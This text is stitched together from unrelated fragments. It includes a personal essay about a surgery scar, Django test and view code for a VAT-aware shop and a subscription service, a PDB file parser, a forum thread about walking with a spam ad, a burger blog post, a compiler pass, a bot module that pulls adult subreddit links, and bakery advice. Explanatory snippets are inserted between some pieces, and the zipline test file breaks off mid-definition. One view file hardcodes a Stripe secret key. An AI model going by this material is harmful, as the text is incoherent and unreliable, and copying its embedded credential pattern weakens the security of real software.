story explaining that someone had spotted a three-inch-long scar just behind the hairline of Princess Kate by carefully looking at a close-up photo. The writer wondered what that scar could be from. Most of the comments on the story were to be expected (“Who cares?”, “Give her a break!”, and “So what if she’s not perfect!”). My own thought was: Three inches? That’s nothing–mine is almost 13! My second thought was that my hair would never, ever, give me away. That’s because my thick, wild, wavy, coarse hair–which has been my bane for most of my existence–keeps my secret for me. My hair hides the scar from my brain surgery completely: no one that I meet can see my scar, and it would take more than a chance close-up with a camera to reveal it. I can feel it there, but only because I have memorized its location. My scar will never tell the secret of my surgery (and even if it yelled, the sound would be muffled by the many, many layers of hair I have).
# coding=utf-8

from __future__ import print_function, unicode_literals

from django.test import TestCase
from oscar.core.compat import get_user_model

from oscar_vat_moss.address.forms import UserAddressForm
from oscar_vat_moss.address.models import Country

User = get_user_model()


class UserAddressFormTest(TestCase):

    def setUp(self):
        self.johndoe = get_user_model().objects.create_user('johndoe')
        self.hansmueller = get_user_model().objects.create_user('hansmueller')
        self.uk = Country.objects.create(
            iso_3166_1_a2='GB', name="UNITED KINGDOM")
        self.at = Country.objects.create(
            iso_3166_1_a2='AT', name="AUSTRIA")
        self.de = Country.objects.create(
            iso_3166_1_a2='DE', name="GERMANY")

    def test_valid_address(self):
        # Is a valid address identified correctly?
        data = dict(
            user=self.johndoe,
            first_name="John",
            last_name="Doe",
            line1="123 No Such Street",
            line4="Brighton",
            postcode="BN1 6XX",
            country=self.uk.iso_3166_1_a2,
            phone_number='+44 1273 555 999',
        )
        form = UserAddressForm(self.johndoe, data)
        self.assertTrue(form.is_valid())

    def test_missing_phone_number(self):
        # Is a missing phone number identified correctly?
        data = dict(
            user=self.johndoe,
            first_name="John",
            last_name="Doe",
            line1="123 No Such Street",
            line4="Brighton",
            postcode="BN1 6XX",
            country=self.uk.iso_3166_1_a2,
        )
        form = UserAddressForm(self.johndoe, data)
        self.assertFalse(form.is_valid())

    def test_valid_vatin(self):
        # Is a valid VATIN identified correctly?
        data = dict(
            user=self.hansmueller,
            first_name="Hans",
            last_name="Müller",
            line1="hastexo Professional Services GmbH",
            line4="Wien",
            postcode="1010",
            country=self.at.iso_3166_1_a2,
            vatin='ATU66688202',
            phone_number='+43 1 555 9999',
        )
        form = UserAddressForm(self.hansmueller, data)
        self.assertTrue(form.is_valid())

    def test_invalid_vatin(self):
        # Is an invalid VATIN identified correctly?
        data = dict(
            user=self.hansmueller,
            first_name="Hans",
            last_name="Müller",
            line1="hastexo Professional Services GmbH",
            line4="Wien",
            postcode="1010",
            country=self.at.iso_3166_1_a2,
            vatin='ATU99999999',
        )
        form = UserAddressForm(self.hansmueller, data)
        self.assertFalse(form.is_valid())

    def test_non_matching_vatin(self):
        # Is a VATIN that is correct, but doesn't match the company
        # name, identified correctly?
        data = dict(
            user=self.hansmueller,
            first_name="Hans",
            last_name="Müller",
            line1="Example, Inc.",
            line4="Wien",
            postcode="1010",
            country=self.at.iso_3166_1_a2,
            vatin='ATU66688202',
        )
        form = UserAddressForm(self.hansmueller, data)
        self.assertFalse(form.is_valid())

    def test_non_matching_country_and_phone_number(self):
        # Is an invalid combination of country and phone number
        # identified correctly?
        data = dict(
            user=self.hansmueller,
            first_name="Hans",
            last_name="Müller",
            line1="Example, Inc.",
            line4="Wien",
            postcode="1010",
            phone_number="+49 30 1234567",
            country=self.at.iso_3166_1_a2,
        )
        form = UserAddressForm(self.hansmueller, data)
        self.assertFalse(form.is_valid())

    def test_non_matching_address_and_phone_number(self):
        # Is an invalid combination of postcode and phone area code,
        # where this information would be relevant for a VAT
        # exception, identified correctly?
        data = dict(
            user=self.hansmueller,
            first_name="Hans",
            last_name="Müller",
            line1="Example, Inc.",
            # Jungholz is a VAT exception area where German, not
            # Austrian, VAT rates apply
            line4="Jungholz",
            # Correct postcode for Jungholz
            postcode="6691",
            # Incorrect area code (valid number, but uses Graz area
            # code)
            phone_number="+43 316 1234567",
            country=self.at.iso_3166_1_a2,
        )
        form = UserAddressForm(self.hansmueller, data)
        self.assertFalse(form.is_valid())
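The country/phone-number tests above exercise a consistency rule that can be sketched in isolation: the dial code of the phone number must agree with the address country. The snippet below is a deliberately simplified, hypothetical illustration (a tiny hard-coded dial-code table); the real validation in the library parses full phone numbers rather than matching prefixes:

```python
# Hypothetical, minimal dial-code table for illustration only.
DIAL_CODES = {'+43': 'AT', '+44': 'GB', '+49': 'DE'}

def phone_matches_country(phone_number, country_code):
    """Return True if the number's international prefix maps to the
    given ISO 3166-1 alpha-2 country code; fail closed on unknown
    prefixes."""
    for prefix, country in DIAL_CODES.items():
        if phone_number.startswith(prefix):
            return country == country_code
    return False

# A German number on an Austrian address should be rejected,
# mirroring test_non_matching_country_and_phone_number above.
print(phone_matches_country('+49 30 1234567', 'AT'))  # False
```

Note that a prefix table cannot catch the Jungholz-style cases in the last test, where the *area code within* a country matters; that is why full number parsing is needed in practice.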
Losing weight can be hard without any help. This is where we come in. We offer a FREE exclusive emailing newsletter to everyone on this forum for a limited time. We provide great health insights, FREE giveaways and advice. @HammH LOL! You mean because I posted a pic of myself AFTER having consumed 3 glasses of eggnog and 1 whole pie in the previous 2 weeks? And that I'd not been lifting weights in like 8 weeks? Meh: what's a little pride measured against a great opportunity to make a point about fitness? Hey Epster - Is that gauzy looking thing on your hat a mosquito net? Wouldn't think you get many of them in Co. Also - Big congrats on the "good health" program and results. Never forget - you have been, are, always will be - A work in progress. @wilful LOL! I'm wearing one of those wrap-around visors. So my hair is pulled through the top. That gauze, then, is really just my bangs getting caught in the wind. But yeah, we get mosquitos here in the summer. We do carry nets for slipping over the head while hiking. Some summers are b a d. And thanks. It's been a fun and weird journey, all this changing. I'm about 3 pounds away from an entirely new wardrobe: even my smallest-sized attire is beginning to hang on me. The best part: I feel like a 20-something. I sleep great, have a ton of energy, and no body parts complain when I move. And of course my vitals continue to be excellent. So yay! Do you want to know how many calories you burn walking one mile, two miles, or more? How much does your walking speed matter? Your weight and the distance you walk are the biggest factors in how many calories you burn while walking. A rule of thumb is that about 100 calories per mile are burned for a 180-pound person and 65 calories per mile are burned for a 120-pound person. Your walking speed matters less. If you use a Fitbit or other tracker you may see this information as you go. @ReTiReD51 One of the great things about walking is that it is free.
No membership, no special equipment. Just start walking. If you’re able, walking is a perfect exercise because you can do it anywhere. @nyadrn suggests: set your own goal; only you know “what motivates” you. Remember, any number of steps walking is better than none. Good advice by both ladies. Walking your dog is a fun way to increase your daily steps.
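The rule of thumb quoted above (about 100 calories per mile at 180 pounds, 65 at 120) can be turned into a quick ballpark estimator. This sketch assumes calorie burn scales linearly with body weight between those two anchor points; real numbers also depend on pace, terrain, and fitness, so treat it only as a rough guide:

```python
def walking_calories(weight_lb, miles):
    """Rough walking-calorie estimate from the forum's rule of thumb:
    ~100 cal/mile at 180 lb, ~65 cal/mile at 120 lb, interpolated
    linearly in body weight."""
    cal_per_mile = 65 + (weight_lb - 120) * (100 - 65) / (180 - 120)
    return cal_per_mile * miles

# A 180-lb walker covering 2 miles burns roughly 200 calories
print(round(walking_calories(180, 2)))  # 200
```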
""" Handle PDB files. """ __author__ = "Steven Kearnes" __copyright__ = "Copyright 2014, Stanford University" __license__ = "BSD 3-clause" from collections import OrderedDict class PdbReader(object): """ Handle PDB files. Also supports conversion from PDB to Amber-style PQR files. """ def parse_atom_record(self, line): """ Extract fields from a PDB ATOM or HETATM record. See http://deposit.rcsb.org/adit/docs/pdb_atom_format.html. Parameters ---------- line : str PDB ATOM or HETATM line. """ assert line.startswith('ATOM') or line.startswith('HETATM') fields = OrderedDict() fields['record_name'] = line[:6] fields['serial_number'] = int(line[6:11]) fields['atom_name'] = line[12:16] fields['alternate_location'] = line[16] fields['residue_name'] = line[17:20] fields['chain'] = line[21] fields['residue_number'] = int(line[22:26]) fields['insertion_code'] = line[26] fields['x'] = float(line[30:38]) fields['y'] = float(line[38:46]) fields['z'] = float(line[46:54]) # parse additional fields fields.update(self._parse_atom_record(line)) # strip extra whitespace from fields for key in fields.keys(): try: fields[key] = fields[key].strip() except AttributeError: pass return fields def _parse_atom_record(self, line): """ Parse optional fields in ATOM and HETATM records. Parameters ---------- line : str PDB ATOM or HETATM line. """ fields = OrderedDict() try: fields['occupancy'] = float(line[54:60]) fields['b_factor'] = float(line[60:66]) fields['segment'] = line[72:76] fields['element'] = line[76:78] fields['charge'] = line[78:80] except IndexError: pass return fields def pdb_to_pqr(self, pdb, charges, radii): """ Convert PDB to Amber-style PQR by adding charge and radius information. See p. 68 of the Amber 14 Reference Manual. Parameters ---------- pdb : file_like PDB file. charges : array_like Atomic partial charges. radii : array_like Atomic radii. 
""" # only certain PDB fields are used in the Amber PQR format pdb_fields = ['record_name', 'serial_number', 'atom_name', 'residue_name', 'chain', 'residue_number', 'x', 'y', 'z'] i = 0 pqr = '' for line in pdb: if line.startswith('ATOM') or line.startswith('HETATM'): fields = self.parse_atom_record(line) # charge and radius are added after x, y, z coordinates pqr_fields = [] for field in pdb_fields: value = fields[field] if value == '': value = '?' pqr_fields.append(str(value)) pqr_fields.append(str(charges[i])) pqr_fields.append(str(radii[i])) line = ' '.join(pqr_fields) + '\n' i += 1 # update atom count pqr += line # check that we covered all the atoms assert i == len(charges) == len(radii) return pqr
May 28 is not any ordinary day! It’s National Hamburger Day! Okay. Okay. I know I’m a few days early, but it’s best to be prepared! You might as well mark it on your calendars now! In fact, the whole month of May is National Hamburger Month. Obviously, National Hamburger Day being on May 28 is the perfect way to end the month, so why not enjoy a delicious burger? Did you know? Americans eat almost 50 billion burgers a year – that’s the equivalent of three burgers a week for every person in the United States! So, I figured in the spirit of National Hamburger Day, I would name five of the best burgers I’ve ever had in Lexington and where you can find them, so you can eat one and celebrate this glorious day! The KY Bourbon Burger was the Winner of the 2015 Taste of the Bluegrass. I remember the first time I tried this burger! Back in 2016, I attended an event put on by The Bourbon Social called Beer, Bourbon, and Bacon Garden Party. It was held at the beautiful Ashland, The Henry Clay Estate. This burger happened to be one of the dishes there! Lexington Diner and Creative Table Kitchen and Catering catered it. At the event, sliders were served instead of a normal-sized burger. This burger was so delicious that I knew I had to go to Lexington Diner and order the full-sized burger. What’s on the KY Bourbon Burger you ask? This burger has bourbon BBQ, applewood bacon, ghost pepper jack, and fried onion straws. Yes, it has ghost pepper! Don’t let that scare you off! But I’ll have to warn you – it does give the burger a lot of heat! Minglewood is a great restaurant off of North Limestone located in the heart of downtown. Last year I had this burger during Lexington Eats Week (This was to replace Lexington Restaurant Week, which had lost a key sponsor at the last minute. Don’t worry though! Lexington Restaurant Week is back and is happening this year on July 26 to August 4).
I’m a sucker for a great burger, so when I saw Minglewood’s Noli Burger on their menu, I knew I had to order it! The Noli Burger has melted brie and bacon and bourbon orange marmalade. It’s ooey and gooey and extremely messy, but oh so good! It’s probably one of the best (if not the best) burger that I’ve eaten! I obviously couldn’t write a post about my favorite burgers and National Hamburger Day without mentioning Bad Wolf Burgers. There are tons of different options, so you could try something new every time you go! One of my favorites is the Bill Meck Burger, which has peanut butter and bacon. It may sound weird, but trust me, it works! I must have a knack for choosing the messiest burgers to eat, but I’ve found those to be the most delicious! The Bourbon Barrel Deluxe Burger from Windy Corner Market isn’t any different. It has everything a person could love – it’s a 1/3 pound patty with Bourbon Bacon Jam, their own Bourbon Barbecue Sauce, and Bourbon Barrel Beer Cheese (as well as lettuce, tomato, and red onion). You can never go wrong with a good bourbon BBQ sauce! Just like the Noli Burger from Minglewood, I also tried the Swayze Burger from Al’s Bar during Lexington Eats Week. This burger was made by the chefs from The Epic Cure. Al’s Bar also offered the Swayze Burger during 2017’s Lexington Burger Week. This burger has Swiss and American cheeses, fried bologna, lettuce, tomato, onion, pickle, and Grippos. Grippos on a burger? Sign me up! Obviously, I can’t include every burger I’ve ever eaten on the list, nor have I been to every restaurant in Lexington. These were just five burgers that stood out above the rest among the ones that I have had. If you live in Lexington, please let me know what your favorite burger is and where I can eat it! I’m always looking to try new restaurants!
import sys

from expression_walker import walk
from pass_utils import BINOPS, UNOPS

try:
    import gelpia_logging as logging
    import color_printing as color
except ModuleNotFoundError:
    sys.path.append("../")
    import gelpia_logging as logging
    import color_printing as color

logger = logging.make_module_logger(color.cyan("lift_consts"),
                                    logging.HIGH)


def pass_lift_consts(exp, inputs):
    """ Extracts constant values from an expression """
    CONST = {"Const", "ConstantInterval", "Integer", "Float", "SymbolicConst"}
    NON_CONST_UNOPS = {"sinh", "cosh", "tanh", "dabs", "datanh",
                       "floor_power2", "sym_interval"}
    consts = dict()
    hashed = dict()

    def make_constant(exp):
        if exp[0] == "Const":
            assert(exp[1] in consts)
            return exp
        try:
            key = hashed[exp]
            assert(logger("Found use of existing const {}", key))
        except KeyError:
            key = "$_const_{}".format(len(hashed))
            assert(exp not in hashed)
            hashed[exp] = key
            assert(key not in consts)
            consts[key] = exp
            assert(logger("Lifting const {} as {}", exp, key))
        return ('Const', key)

    def _expand_positive_atom(work_stack, count, exp):
        work_stack.append((True, count, (*exp, True)))

    def _expand_negative_atom(work_stack, count, exp):
        assert(len(exp) == 2)
        work_stack.append((True, count, (exp[0], exp[1], False)))

    my_expand_dict = dict()
    my_expand_dict.update(zip(CONST, [_expand_positive_atom for _ in CONST]))
    my_expand_dict["Input"] = _expand_negative_atom

    def _pow(work_stack, count, args):
        assert(args[0] == "pow")
        assert(len(args) == 3)
        l, left = args[1][-1], args[1][:-1]
        r, right = args[2][-1], args[2][:-1]
        op = args[0]
        if right[0] != "Integer":
            op = "powi"
        if op == "pow":
            r = False
        # If both are constant don't consolidate yet
        status = False
        if l and r:
            status = True
        # Otherwise consolidate any arguments that are constant
        elif l:
            left = make_constant(left)
        elif r:
            right = make_constant(right)
        work_stack.append((True, count, (op, left, right, status)))

    def _two_item(work_stack, count, args):
        assert(len(args) == 3)
        l, left = args[1][-1], args[1][:-1]
        r, right = args[2][-1], args[2][:-1]
        op = args[0]
        # If both are constant don't consolidate yet
        status = False
        if l and r:
            status = True
        # Otherwise consolidate any arguments that are constant
        elif l:
            left = make_constant(left)
        elif r:
            right = make_constant(right)
        work_stack.append((True, count, (op, left, right, status)))

    def _tuple(work_stack, count, args):
        assert(args[0] == "Tuple")
        assert(len(args) == 3)
        l, left = args[1][-1], args[1][:-1]
        if len(args[2]) == 1:
            r, right = False, args[2]
        else:
            r, right = args[2][-1], args[2][:-1]
        op = args[0]
        if l:
            left = make_constant(left)
        if r:
            right = make_constant(right)
        work_stack.append((True, count, (op, left, right, False)))

    def _one_item(work_stack, count, args):
        assert(len(args) == 2)
        a, arg = args[1][-1], args[1][:-1]
        op = args[0]
        work_stack.append((True, count, (op, arg, a)))

    def _bad_one_item(work_stack, count, args):
        assert(len(args) == 2)
        a, arg = args[1][-1], args[1][:-1]
        op = args[0]
        if a:
            arg = make_constant(arg)
        work_stack.append((True, count, (op, arg, False)))

    def _box(work_stack, count, args):
        assert(args[0] == "Box")
        box = ["Box"]
        for sub in args[1:]:
            p, part = sub[-1], sub[:-1]
            if p:
                part = make_constant(part)
            box.append(part)
        box.append(False)
        work_stack.append((True, count, tuple(box)))

    def _return(work_stack, count, args):
        assert(args[0] == "Return")
        assert(len(args) == 2)
        r, retval = args[1][-1], args[1][:-1]
        if r:
            retval = make_constant(retval)
        return r, ("Return", retval)

    my_contract_dict = dict()
    my_contract_dict.update(zip(BINOPS, [_two_item for _ in BINOPS]))
    my_contract_dict.update(zip(UNOPS, [_one_item for _ in UNOPS]))
    my_contract_dict.update(zip(NON_CONST_UNOPS,
                                [_bad_one_item for _ in NON_CONST_UNOPS]))
    my_contract_dict["Box"] = _box
    my_contract_dict["Tuple"] = _tuple
    my_contract_dict["pow"] = _pow
    my_contract_dict["Return"] = _return

    n, new_exp = walk(my_expand_dict, my_contract_dict, exp)

    assert(n in {True, False})
    assert(type(new_exp) is tuple)
    assert(new_exp[0] not in {True, False})

    return n, new_exp, consts


def main(argv):
    logging.set_log_filename(None)
    logging.set_log_level(logging.HIGH)
    try:
        from function_to_lexed import function_to_lexed
        from lexed_to_parsed import lexed_to_parsed
        from pass_lift_inputs_and_inline_assigns import \
            lift_inputs_and_inline_assigns
        from pass_utils import get_runmain_input
        from pass_simplify import simplify
        from pass_reverse_diff import reverse_diff

        data = get_runmain_input(argv)
        logging.set_log_level(logging.NONE)
        tokens = function_to_lexed(data)
        tree = lexed_to_parsed(tokens)
        exp, inputs = lift_inputs_and_inline_assigns(tree)
        exp = simplify(exp, inputs)
        d, diff_exp = reverse_diff(exp, inputs)
        diff_exp = simplify(diff_exp, inputs)

        logging.set_log_level(logging.HIGH)
        logger("raw: \n{}\n", data)
        const, exp, consts = pass_lift_consts(diff_exp, inputs)

        logger("inputs:")
        for name, interval in inputs.items():
            logger("    {} = {}", name, interval)
        logger("consts:")
        for name, val in consts.items():
            logger("    {} = {}", name, val)
        logger("expression:")
        logger("    {}", exp)
        logger("is_const: {}", const)

        return 0

    except KeyboardInterrupt:
        logger(color.green("Goodbye"))
        return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
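The caching idea behind `make_constant` above — hash each constant subexpression once and reuse the generated `$_const_N` name on later sightings — can be sketched standalone. The expression tuples below are illustrative stand-ins, not gelpia's full expression format:

```python
def lift_constants(exprs):
    """Assign each distinct constant expression a generated name, reusing
    the name for repeats (mirrors the hashed/consts pair in pass_lift_consts)."""
    hashed = {}   # expression tuple -> generated name
    consts = {}   # generated name -> expression tuple
    lifted = []
    for exp in exprs:
        if exp not in hashed:
            key = "$_const_{}".format(len(hashed))
            hashed[exp] = key
            consts[key] = exp
        # every occurrence is replaced by a reference to the shared name
        lifted.append(("Const", hashed[exp]))
    return lifted, consts


exprs = [("Float", "1.5"), ("Integer", "2"), ("Float", "1.5")]
lifted, consts = lift_constants(exprs)
print(lifted)   # the repeated 1.5 maps to the same $_const_0 name
print(consts)
```

Because tuples are hashable, the dictionary lookup makes deduplication O(1) per subexpression, which is why the real pass stores whole expression tuples as keys.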
Connect with Winter throughout February on the Knowledge Centre! Wiarton Willie may have predicted an early spring, but the reality is, regardless of what the prognosticating rodent had to say, it's only the beginning of February and we've still got a lot of winter ahead of us! And while the weather outside might be frightful to some of us, don't let that keep you inside! Throughout February, join the Canadian Wildlife Federation on the Knowledge Centre and explore your connection with winter and the many reasons to get outside when it's #BelowZero. Join the discussion. Share your insights and experiences. Ask questions. Keep the conversation going throughout February and beyond! Get Outside This Winter – For the Health of it!
import threading
import queue
import modules.loggers
import logging
from modules.tools import GetJson

logger = logging.getLogger(__name__)

porn_dict = dict()
lock = threading.Lock()


def Reddits(key):
    global porn_dict
    # a bit hacky...
    if key in porn_dict.keys():
        try:
            lock.acquire()
            content = porn_dict[key].pop()['data']['url']
            logger.info('From {} len {} send {}'.format(
                key, len(porn_dict[key]), content))
            lock.release()
            return content
        except IndexError as indexError:
            # empty list: fall through and fetch fresh data below
            logger.warning(indexError)
            lock.release()

    q = queue.Queue()
    r = 'https://www.reddit.com'
    reddits = {'asians_gif': '/r/asian_gifs/.json?limit=100',
               'anal': '/r/anal/.json?limit=100',
               'asianhotties': '/r/asianhotties/.json?limit=100',
               'AsiansGoneWild': '/r/AsiansGoneWild/.json?limit=100',
               'RealGirls': '/r/RealGirls/.json?limit=100',
               'wallpapers': '/r/wallpapers/.json?limit=100',
               'fitnessgirls': ['/r/JustFitnessGirls/.json?limit=100',
                                '/r/HotForFitness/.json?limit=100']}
    urls = []
    if key in reddits.keys():
        if isinstance(reddits[key], str):
            urls.append(r + reddits[key])
        else:
            for url in reddits[key]:
                urls.append(r + url)
    try:
        threads = []
        for url in urls:
            t = threading.Thread(target=GetJson, args=(url,),
                                 kwargs=dict(queue=q), name=key)
            threads.append(t)
            t.start()
        data = list()
        for thread in threads:
            thread.join()
            result = q.get()
            data.extend(result['data']['children'])
        lock.acquire()
        porn_dict[key] = data
        content = porn_dict[key].pop()['data']['url']
        lock.release()
        logger.info('send {}'.format(content))
        return content
    except Exception as e:
        # only release if the lock is actually held, otherwise release() raises
        if lock.locked():
            lock.release()
        logger.warning(e)
        return "An error occurred :( " + str(e)
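The fetch path above fans out one thread per URL, joins them, and drains a shared queue. That pattern can be sketched standalone with a stub in place of `GetJson` (the stub and its payload shape are illustrative, not the real fetcher):

```python
import threading
import queue


def fetch_stub(url, queue=None):
    # Stand-in for GetJson: pretend each URL yields two posts.
    queue.put({'data': {'children': [url + '#1', url + '#2']}})


def gather(urls):
    q = queue.Queue()
    threads = []
    for url in urls:
        t = threading.Thread(target=fetch_stub, args=(url,),
                             kwargs=dict(queue=q))
        threads.append(t)
        t.start()
    data = []
    for t in threads:
        t.join()                 # wait for this worker to finish
        result = q.get()         # one queued payload per worker
        data.extend(result['data']['children'])
    return data


posts = gather(['/r/a', '/r/b'])
print(len(posts))  # 4
```

Note that `q.get()` returns payloads in completion order, not submission order, so consumers should not assume results line up with the `urls` list.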
What do you mean by "split filling"? At Ambrosia we thrive on serving the best quality products. What sets us apart from other bakeries is how we split the layers of cake and use a filling of your choice, like buttercream icing or fruit fillings. Some of our cakes, like the Fresh Strawberry Cake and many other Specialty Cakes, are split twice and have filling between all four layers.

To cut round cakes, move in two inches from the cake's outer edge; cut a circle and then slice approximately 1 1/2 inch pieces within the circle. Now move in another two inches, cut another circle, slice approximately 1 1/2 inch pieces, and so on until the cake is completely cut. Note: 6 inch diameter cakes should be cut in wedges, without a center circle. Cut Petal and Hexagon cakes similarly to round tiers.

To cut square cakes, move in two inches from the outer edge, top to bottom, then slice approximately 1 1/2 inch pieces of cake. Now move in another two inches and slice again until the entire cake is cut.

Follow the diagrams below to cut sheet cakes (from 3 to 6 in. high), but adjust for the larger party-size slices. For cakes shorter than 3 in. you will need to cut wider slices to serve a proper portion. All sheet cakes from The Ambrosia Bakery come as a "single layer cake" that is split into two with a filling. That filling can be buttercream icing or any of the fruit or cream flavored fillings that we offer. Some fillings do have an additional charge.
from app.models import Address, Subscription
from django.contrib.auth import authenticate, login, logout, \
    update_session_auth_hash
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect
from django.shortcuts import render
from itertools import chain

import stripe

stripe.api_key = "sk_test_7omNc4LQGjHI7viCIxfGfIr5"


def index(request):
    return render(request, 'app/index.html')


def signup(request):
    if request.method == 'POST':
        context = {'fname': request.POST['fname'],
                   'lname': request.POST['lname'],
                   'email': request.POST['email'],
                   'ship_addr': request.POST['shipaddr'],
                   'gift_addr': request.POST['giftaddr']}
        username = request.POST['username']
        password = request.POST['password']
        try:
            user = User.objects.create_user(username, context['email'],
                                            password)
            user.first_name = context['fname']
            user.last_name = context['lname']
            user.full_clean()
            user.save()
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
        except Exception as e:
            print(e)
            context['user_exists'] = True
            return render(request, 'app/signup.html', context)
        shipping = Address(user=user, value=context['ship_addr'],
                           personal=True)
        shipping.save()
        if len(context['gift_addr']) > 0:
            gift = Address(user=user, value=context['gift_addr'])
            gift.save()
        return HttpResponseRedirect('/')
    return render(request, 'app/signup.html')


def signin(request):
    errors = {}
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = authenticate(username=username, password=password)
        if user is not None:
            if user.is_active:
                login(request, user)
                if 'next' in request.GET:
                    return HttpResponseRedirect(request.GET['next'])
                else:
                    return HttpResponseRedirect('/')
            else:
                errors['disabled'] = True
        else:
            errors['invalid'] = True
    return render(request, 'app/signin.html', errors)


def signout(request):
    logout(request)
    return HttpResponseRedirect('/signin/')
@login_required
def crate(request, plan):
    context = {'plan': plan,
               'personal_addr': Address.objects.get(user=request.user,
                                                    personal=True),
               'gift_addrs': Address.objects.filter(user=request.user,
                                                    personal=False)}
    if request.method == 'POST':
        subscription = None
        stripe_plan = 'startupcrate_monthly' if plan == '1' \
            else 'startupcrate_quarterly'
        if 'recipient' in request.POST:
            recipient = request.POST['recipient']
            address_id = request.POST['pastaddr']
            address = None
            if int(address_id) > 0:
                address = Address.objects.get(pk=address_id)
            if not address:
                address = Address(user=request.user,
                                  value=request.POST['newaddr'])
        else:
            recipient = '{0} {1}'.format(request.user.first_name,
                                         request.user.last_name)
            address = context['personal_addr']
        try:
            address.full_clean()
            address.save()
            subscription = Subscription(ship_address=address,
                                        recipient_name=recipient)
            subscription.full_clean()
            subscription.save()
            customer = stripe.Customer.create(
                source=request.POST['stripeToken'],
                plan=stripe_plan,
                email=request.POST['stripeEmail'])
            subscription.stripe_customer = customer['id']
            subscription.save()
            return HttpResponseRedirect('/subscriptions/')
        except Exception as e:
            print(e)
            context['invalid'] = True
            if subscription:
                subscription.delete()
    return render(request, 'app/crate.html', context)


@login_required
def subscriptions(request):
    if request.method == 'POST':
        print(request.POST)
        address_id = request.POST['pastaddr']
        address = None
        if int(address_id) > 0:
            address = Address.objects.get(pk=address_id)
        if not address:
            address = Address(user=request.user,
                              value=request.POST['newaddr'])
        try:
            subscription = Subscription.objects.get(
                pk=request.POST['subscription_id'])
            address.full_clean()
            address.save()
            subscription.ship_address = address
            subscription.full_clean()
            subscription.save()
        except Exception as e:
            print(e)
    context = {
        'personal_subs': Subscription.objects.filter(
            ship_address=Address.objects.filter(user=request.user,
                                                personal=True)),
        'gift_addrs': Address.objects.filter(user=request.user,
                                             personal=False)
    }
    context['gift_subs'] = Subscription.objects.filter(
        ship_address__in=context['gift_addrs'])
    context['subscriptions'] = list(chain(context['personal_subs'],
                                          context['gift_subs']))
    return render(request, 'app/subscriptions.html', context)


@login_required
def settings(request):
    context = {'ship_addr': Address.objects.get(user=request.user,
                                                personal=True)}
    if request.method == 'POST':
        username = request.user.get_username()
        password = request.POST['password']
        if authenticate(username=username, password=password) is not None:
            if 'delete' in request.POST:
                user = request.user
                subs = Subscription.objects.filter(
                    ship_address__in=Address.objects.filter(user=user))
                for subscription in subs:
                    subscription.stripe_cancel()
                logout(request)
                user.delete()
                return HttpResponseRedirect('/signup/')
            request.user.first_name = request.POST['fname']
            request.user.last_name = request.POST['lname']
            request.user.email = request.POST['email']
            new_password = request.POST['newpass']
            if len(new_password) >= 8:
                request.user.set_password(new_password)
            try:
                request.user.full_clean()
                request.user.save()
                update_session_auth_hash(request, request.user)
                context['ship_addr'].value = request.POST['shipaddr']
                context['ship_addr'].full_clean()
                context['ship_addr'].save()
            except Exception as e:
                print(e)
                context['invalid_fields'] = True
            else:
                context['changes_saved'] = True
        else:
            context['invalid_credentials'] = True
    return render(request, 'app/settings.html', context)


@login_required
def change(request, subscription_id):
    try:
        subscription = Subscription.objects.get(pk=subscription_id)
        subscription.stripe_change_plan()
    except Exception as e:
        print(e)
    return HttpResponseRedirect('/subscriptions/')


@login_required
def cancel(request, subscription_id):
    try:
        subscription = Subscription.objects.get(pk=subscription_id)
        subscription.stripe_cancel()
        subscription.delete()
    except Exception as e:
        print(e)
    return HttpResponseRedirect('/subscriptions/')
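The `subscriptions` view above merges personal and gift subscriptions with `itertools.chain` before handing them to the template. The idiom works on any iterables, so it can be shown with plain lists standing in for the querysets:

```python
from itertools import chain

# Stand-ins for the two querysets built in the view.
personal_subs = ['sub-1']
gift_subs = ['sub-2', 'sub-3']

# chain() lazily concatenates the sequences without copying either one;
# list() materializes the combined result for the template context.
subscriptions = list(chain(personal_subs, gift_subs))
print(subscriptions)
```

Chaining in Python rather than issuing a combined database query is a simplicity trade-off: it avoids a UNION but loses database-side ordering across the two sets.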
Funny LGBT Pride Sticker app: insight & download. Do you want to impress your friends? Now you can enhance your iMessages with Funny LGBT Pride Sticker.
"""
Tests for Algorithms using the Pipeline API.
"""
from os.path import (
    dirname,
    join,
    realpath,
)

from nose_parameterized import parameterized
import numpy as np
from numpy import (
    array,
    arange,
    full_like,
    float64,
    nan,
    uint32,
)
from numpy.testing import assert_almost_equal
import pandas as pd
from pandas import (
    concat,
    DataFrame,
    date_range,
    read_csv,
    Series,
    Timestamp,
)
from six import iteritems, itervalues
from trading_calendars import get_calendar

from zipline.api import (
    attach_pipeline,
    pipeline_output,
    get_datetime,
)
from zipline.errors import (
    AttachPipelineAfterInitialize,
    PipelineOutputDuringInitialize,
    NoSuchPipeline,
    DuplicatePipelineName,
)
from zipline.finance.trading import SimulationParameters
from zipline.lib.adjustment import MULTIPLY
from zipline.pipeline import Pipeline, CustomFactor
from zipline.pipeline.factors import VWAP
from zipline.pipeline.data import USEquityPricing
from zipline.pipeline.loaders.frame import DataFrameLoader
from zipline.pipeline.loaders.equity_pricing_loader import (
    USEquityPricingLoader,
)
from zipline.testing import str_to_seconds
from zipline.testing import create_empty_splits_mergers_frame
from zipline.testing.fixtures import (
    WithMakeAlgo,
    WithAdjustmentReader,
    WithBcolzEquityDailyBarReaderFromCSVs,
    ZiplineTestCase,
)
from zipline.utils.pandas_utils import normalize_date

TEST_RESOURCE_PATH = join(
    dirname(dirname(realpath(__file__))),  # zipline_repo/tests
    'resources',
    'pipeline_inputs',
)


def rolling_vwap(df, length):
    "Simple rolling vwap implementation for testing"
    closes = df['close'].values
    volumes = df['volume'].values
    product = closes * volumes
    out = full_like(closes, nan)
    for upper_bound in range(length, len(closes) + 1):
        bounds = slice(upper_bound - length, upper_bound)
        out[upper_bound - 1] = product[bounds].sum() / volumes[bounds].sum()
    return Series(out, index=df.index)


class ClosesAndVolumes(WithMakeAlgo, ZiplineTestCase):
    START_DATE = pd.Timestamp('2014-01-01', tz='utc')
    END_DATE = pd.Timestamp('2014-02-01', tz='utc')
    dates = date_range(START_DATE, END_DATE,
                       freq=get_calendar("NYSE").day,
                       tz='utc')

    SIM_PARAMS_DATA_FREQUENCY = 'daily'
    DATA_PORTAL_USE_MINUTE_DATA = False

    # FIXME: This currently uses benchmark returns from the trading
    # environment.
    BENCHMARK_SID = None

    @classmethod
    def make_equity_info(cls):
        cls.equity_info = ret = DataFrame.from_records([
            {
                'sid': 1,
                'symbol': 'A',
